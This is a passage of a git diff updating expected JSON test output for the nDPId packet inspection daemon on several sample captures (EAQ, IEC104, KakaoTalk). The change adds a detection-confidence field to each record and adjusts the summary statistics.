+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949735,"flow_last_seen":1432821036045,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.67","src_port":51569,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1432820948562,"flow_last_seen":1432820948767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":648,"flow_avg_l4_payload_len":72,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}}
+00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820949806,"flow_last_seen":1432821036155,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.66","src_port":41438,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820953931,"flow_last_seen":1432821040151,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.68","src_port":59959,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820969101,"flow_last_seen":1432821033791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.66","src_port":33356,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820956931,"flow_last_seen":1432821043151,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.68","src_port":47714,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820968101,"flow_last_seen":1432821032791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.67","src_port":60013,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820950865,"flow_last_seen":1432821036155,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.68","src_port":43641,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949586,"flow_last_seen":1432821035895,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.138.146","src_port":52257,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820959095,"flow_last_seen":1432821045664,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.66","src_port":56128,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820963101,"flow_last_seen":1432821027791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.68","src_port":43934,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820957932,"flow_last_seen":1432821044555,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.66","src_port":43979,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820966101,"flow_last_seen":1432821030791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.67","src_port":50175,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820954931,"flow_last_seen":1432821041151,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.67","src_port":37985,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820970111,"flow_last_seen":1432821034791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.67","src_port":40058,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
 00154{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","total-events-serialized":195}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 197/197
@@ -201,10 +201,10 @@
 ~~ total active/idle flows...: 31/31
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4636643 bytes
-~~ total memory freed........: 4636643 bytes
-~~ total allocations/frees...: 99846/99846
+~~ total memory allocated....: 4711756 bytes
+~~ total memory freed........: 4711756 bytes
+~~ total allocations/frees...: 101436/101436
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 159 chars
-~~ json string max len.......: 808 chars
-~~ json string avg len.......: 553 chars
+~~ json string max len.......: 915 chars
+~~ json string avg len.......: 607 chars
diff --git a/test/results/IEC104.pcap.out b/test/results/IEC104.pcap.out
index 8472c7fee..56838fd00 100644
--- a/test/results/IEC104.pcap.out
+++ b/test/results/IEC104.pcap.out
@@ -4,13 +4,13 @@
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317629088520,"flow_last_seen":1317629088520,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1317629088520,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1317629088520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1317629088520,"pkt":"eCvLK7lWABIAxkrACABFAAAoSx9AAH0GYW0Kr9MDCndpGglk1fFZgPwe3z\/\/ZlAQ+y9PxQAAAAAAAAAA"}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1317629088532,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"ts_msec":1317629088532,"pkt":"eCvLK7lWABIAxkrACABFAAAuUsZAAH0GWcIKr9MBCndpGglk1fBIoLt3AFkTVVAY\/em9wgAAaAQBAEK5"}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1317629088495,"flow_last_seen":1317629088532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":3,"midstream":1,"ts_msec":1317629088532,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","ndpi": {"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1317629088495,"flow_last_seen":1317629088532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":3,"midstream":1,"ts_msec":1317629088532,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1317629088536,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"ts_msec":1317629088536,"pkt":"eCvLK7lWABIAxkrACABFAAAuSyRAAH0GYWIKr9MDCndpGglk1fFZgPwe3z\/\/ZlAY+y+j+QAAaAQBAEK5"}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1317629088520,"flow_last_seen":1317629088536,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":3,"midstream":1,"ts_msec":1317629088536,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","ndpi": {"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1317629088520,"flow_last_seen":1317629088536,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":3,"midstream":1,"ts_msec":1317629088536,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1317629088731,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1317629088731,"pkt":"AAAMB6wBeCvLK7lWCABFAAAoJ9JAAIAGAAAKd2kaCq\/TAdXwCWQAWRNVSKC7fVAQAP5RXAAA"}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1317629088739,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1317629088739,"pkt":"AAAMB6wBeCvLK7lWCABFAAAoJ9tAAIAGAAAKd2kaCq\/TA9XxCWTfP\/9mWYD8JFAQAP5RXgAA"}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1317629088495,"flow_last_seen":1317629090498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":603,"flow_avg_l4_payload_len":50,"midstream":1,"ts_msec":1317629090498,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1317629088520,"flow_last_seen":1317629088739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":2,"midstream":1,"ts_msec":1317629090498,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1317629088495,"flow_last_seen":1317629090498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":603,"flow_avg_l4_payload_len":50,"midstream":1,"ts_msec":1317629090498,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1317629088520,"flow_last_seen":1317629088739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":2,"midstream":1,"ts_msec":1317629090498,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}}
 00155{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","total-events-serialized":14}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 15/15
@@ -20,10 +20,10 @@
 ~~ total active/idle flows...: 2/2
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4596464 bytes
-~~ total memory freed........: 4596464 bytes
-~~ total allocations/frees...: 99571/99571
+~~ total memory allocated....: 4681089 bytes
+~~ total memory freed........: 4681089 bytes
+~~ total allocations/frees...: 101161/101161
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 160 chars
-~~ json string max len.......: 658 chars
-~~ json string avg len.......: 476 chars
+~~ json string max len.......: 684 chars
+~~ json string avg len.......: 489 chars
diff --git a/test/results/KakaoTalk_chat.pcap.out b/test/results/KakaoTalk_chat.pcap.out
index 88d4ad4d4..58f80d269 100644
--- a/test/results/KakaoTalk_chat.pcap.out
+++ b/test/results/KakaoTalk_chat.pcap.out
@@ -1,64 +1,64 @@
 00446{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069021959,"flow_last_seen":1430069021959,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1430069021959,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":38448,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1430069021959,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1430069021959,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwAAEAAQBHSIAoYUrwKvAEBljAANQAogKaG7QEAAAEAAAAAAAAEYXV0aAVrYWthbwNjb20AAAEAAQ=="}
-00743{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069021959,"flow_last_seen":1430069021959,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1430069021959,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":38448,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"auth.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069021959,"flow_last_seen":1430069021959,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1430069021959,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":38448,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"auth.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022006,"flow_last_seen":1430069022006,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1430069022006,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":35603,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1430069022006,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":79,"pkt_l4_len":43,"ts_msec":1430069022006,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAD8AAEAAQBHSHQoYUrwKvAEBixMANQArGNJpegEAAAEAAAAAAAAHYWMtdGFsawVrYWthbwNjb20AAAEAAQ=="}
-00746{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022006,"flow_last_seen":1430069022006,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1430069022006,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":35603,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"ac-talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022006,"flow_last_seen":1430069022006,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1430069022006,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":35603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"ac-talk.kakao.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022007,"flow_last_seen":1430069022007,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1430069022007,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":57816,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
